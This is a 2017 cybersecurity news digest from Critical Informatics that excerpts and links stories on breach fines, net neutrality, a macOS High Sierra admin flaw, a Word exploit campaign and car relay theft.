IT Security News Blast 11-29-2017

Government Cyber Threats

Infosec Trends to Watch For in Local Government
The critical infrastructure that is maintained and operated by local government is enabled by and dependent upon information technology systems. These technologies support running water, electrical grids, and first responder telecommunications. […] Given the importance of the technology systems, we need to keep our eyes open to the trends in how they are managed. In this Part 1 of this series, I call out the practices of yesterday that will disappear, and I take a first look at where those practices are going.
https://criticalinformatics.com/5-it-trends-changing-local-government/

 

Survey: Financial Costs of a Cyber Attack Increasing Year over Year
The survey found that 21 percent of enterprises report that monetary losses from cybersecurity events have increased year over year. In fact, enterprise organizations estimate financial losses at an average of $884,000, compared to estimates of $471,000 from the previous year.
https://www.healthcare-informatics.com/news-item/cybersecurity/survey-financial-costs-cyber-attack-increasing-year-over-year

 

BANK OF ENGLAND SURVEY: British politicians pose the biggest risk to the UK financial system
The risk to the financial system most cited by respondents in the 2017 H2 survey was “UK political risk,” mentioned by 91% of respondents and up 9 percentage points since 2017 H1. Political risk was also overwhelmingly cited as the number one source of risk, by 67% of the 96 respondents, compared to geopolitics (7%), cyber attack (7%) and the risk of a UK economic downturn (3%).
http://www.businessinsider.com/bank-of-england-risk-survey-biggest-threat-2017-11

 

Health-care group pushes for tighter email security amid fears over fraud
The email protocol was not designed to check if the return address on a message is accurate. Anyone using email can place any name or email address on a message. NH-ISAC will make its members pledge in 2018 to use DMARC, an add-on protocol that ensures unauthorized people cannot send emails from a particular domain.
http://thehill.com/policy/cybersecurity/362024-more-than-half-of-emails-addressed-from-healthcare-providers-are-frauds

 

Cottage Health System fined $2M for 2 separate data breaches linked to ‘basic’ security failures
A California health system has agreed to a $2 million settlement with the state attorney general to settle claims that it failed to implement basic security protocols, which led to the exposure of nearly 55,000 medical records. […] In the first incident, which stretched from 2011 to 2013, patient information was accessible and searchable online without any encryption, password protection or firewall in place to prevent unauthorized access. More than 50,000 patient records were accessed by the time the security flaws were discovered.
https://www.fiercehealthcare.com/privacy-security/cottage-health-system-2-million-california-xavier-becerra-data-breach-information

 

Cyber terrorism ‘an emergent threat’
[The] most relevant cyber terrorist actors currently pose a “low likelihood” of inflicting severe physical destruction through digital means before 2020. However, the report from the Cambridge Centre for Risk Studies said cyber terrorism – defined as an act of politically motivated violence involving physical damage or personal injury caused by a remote digital interference with technology systems – is an “emergent threat”.
http://www.nwemail.co.uk/news/national/article/Cyber-terrorism-an-emergent-threat-612dd406-835a-492b-ba30-8cdfa3d0220c-ds

 

A Consumer Product Safety Commission for cyber?
We need a governance system — to include enforcement, incentives and penalties — to ensure effective implementation of stronger security design practices. […] This is problematic, because market forces alone will not solve our crisis of quality. Companies have little incentive to spend precious resources on information security prior to product launch, and the average consumer is not tech-savvy enough to question how a technology product makes their digital communications more or less safe.
https://fcw.com/articles/2017/11/28/rudolph-comment-cyber-cpsc.aspx

 

IoT Regulation: One Rule to Bind Them All vs Mission Impossible
In the US, the Senate bill ‘The Internet of Things Cyber Security Improvement Act 2017’ is laying the ground rules for IoT device security. Although the legislation will only apply to government agency suppliers and affiliates, it could well establish a benchmark for device manufacture that will influence commercial production.
https://www.infosecurity-magazine.com/magazine-features/iot-regulation-one-rule-vs-mission/

 

Congress poised to jam through reauthorization of mass surveillanc
Civil libertarians have urged Congress to take this reauthorization as an opportunity to implement meaningful reforms to shield innocent Americans from mass surveillance while ensuring that federal intelligence agencies have the tools they need to protect the United States from foreign threats. Some in Congress, however, seem committed to running roughshod over the Fourth Amendment.
http://thehill.com/opinion/cybersecurity/361875-congress-poised-to-jam-through-reauthorization-of-mass-surveillance

 

Internet censorship: It’s on the rise and Silicon Valley is helping it happen
According to York, in the past few months, the EFF has seen Snapchat and Medium comply with the government of Saudi Arabia, an attitude “unthinkable in previous years”. “Internet censorship creates inequality — economic inequality, inequality of ideas, educational inequality, and more,” she said.
http://www.zdnet.com/article/internet-censorship-its-on-the-rise-and-silicon-valley-is-helping-it-happen/

 

Comcast hints at plan for paid fast lanes after net neutrality repeal
[With] Republican Ajit Pai now in charge at the Federal Communications Commission, Comcast’s stance has changed. While the company still says it won’t block or throttle Internet content, it has dropped its promise about not instituting paid prioritization. Instead, Comcast now vaguely says that it won’t “discriminate against lawful content” or impose “anti-competitive paid prioritization.” The change in wording suggests that Comcast may offer paid fast lanes to websites or other online services, such as video streaming providers, after Pai’s FCC eliminates the net neutrality rules next month.
https://arstechnica.com/tech-policy/2017/11/comcast-quietly-drops-promise-not-to-charge-tolls-for-internet-fast-lanes/

 

Internet’s Top Cop Under Trump May Struggle to Run at Web Speeds
The FCC sets rules designed to prevent bad behavior, while the FTC acts after wrongdoing has occurred. That distinction has become a flash point in the debate over Pai’s proposal, which would change the way the government regulates the internet with far-reaching implications for a host of industries. Opponents say that reactive nature means the trade commission is too slow to oversee the rapidly evolving digital economy.
https://www.bloomberg.com/news/articles/2017-11-28/debate-rages-over-ftc-as-web-referee-after-net-neutrality-gutted

 

Cybersecurity skills shortage creating recruitment chaos
CISOs recognize these issues and many organizations are actively hanging a “help wanted” sign to find cybersecurity talent. Unfortunately, it is exceedingly difficult to bring new people onboard. Why? Experienced cybersecurity professionals are in high demand, so organizations are engaged in a battle royale to coax them away from their present employers and outbid others for their services.
https://www.csoonline.com/article/3238745/security/cybersecurity-skills-shortage-creating-recruitment-chaos.html

 

Security firm reveals another NSA leak
“Critical data belonging to the United States Army Intelligence and Security Command (INSCOM), a joint U.S. Army and National Security Agency Defense Department command tasked with gathering intelligence for US military and political leaders, leaked onto the public internet, exposing internal data and virtual systems used for classified communications to anyone with an internet connection,” wrote Vickery and Dan O’Sullivan, a cyber resilience analyst at UpGuard.
https://fcw.com/articles/2017/11/28/nsa-leak-upguard-johnson.aspx

 

Major Apple security flaw grants admin access on macOS High Sierra without password
When the problem is exploited, the user is authenticated into a “System Administrator” account and is given full ability to view files and even reset or change passwords for pre-existing users on that machine. Apple ID email addresses tied to users on the Mac can be removed and altered, as well.
https://www.theverge.com/2017/11/28/16711782/apple-macos-high-sierra-critical-password-security-flaw

 

Boffins craft perfect ‘head generator’ to beat facial recognition
The result, the boffins claimed, is that their model can provide a realistic-looking result, even when it’s faced with “challenging poses and scenarios” including different lighting conditions, such that the “fake” face “blends naturally into the context”.
https://www.theregister.co.uk/2017/11/28/boffins_craft_perfect_head_generator_to_beat_ai_facial_recognition/

 

Hackers are digging into Microsoft Word flaw that existed for last 17 year
Once opened, the user gets to view a blank document, and just the message Enable Editing is visible. This message is only to cover the actual functioning that is happening in the background. The malicious code gets downloaded and runs a PowerShell script so that Cobalt Strike gets installed and the system is hijacked.
https://www.hackread.com/hackers-are-digging-into-microsoft-word-flaw-that-exists-for-last-17-year/

 

Gone in Seconds: Hackers Steal Mercedes Car without Key
A surveillance video shared by West Midlands Police, United Kingdom shows car hacking thieves stole a Mercedes within a few seconds without keys and even without touching the vehicle – Thanks to a relay device. A relay box is an electrically operated switch which works in such a way that other than metal it can detect and receive signals through doors, windows, and walls.
https://www.hackread.com/gone-seconds-hackers-steal-mercedes-car-without-key/

 

Ajit Pai blames Cher and Hulk actor for ginning up net neutrality support
In a speech hosted by conservative group R Street and the Lincoln Network, Pai also addressed criticism from MCU actor Mark Ruffalo, actress Alyssa Milano, former Star Trek actor George Takei, and Silicon Valley actor Kumail Nanjiani. Pai also claimed that Twitter and other Web companies pose a greater threat to Internet freedom than Internet service providers like Comcast.
https://arstechnica.com/tech-policy/2017/11/ajit-pai-blames-cher-and-hulk-actor-for-ginning-up-net-neutrality-support/

 

====

Critical Informatics and the Critical Informatics logo are the trademarks of Critical Informatics, Inc. All other brand names, trademarks, service marks and copyrights are the property of their respective owners.  © 2017 Critical Informatics, Inc. All rights reserved.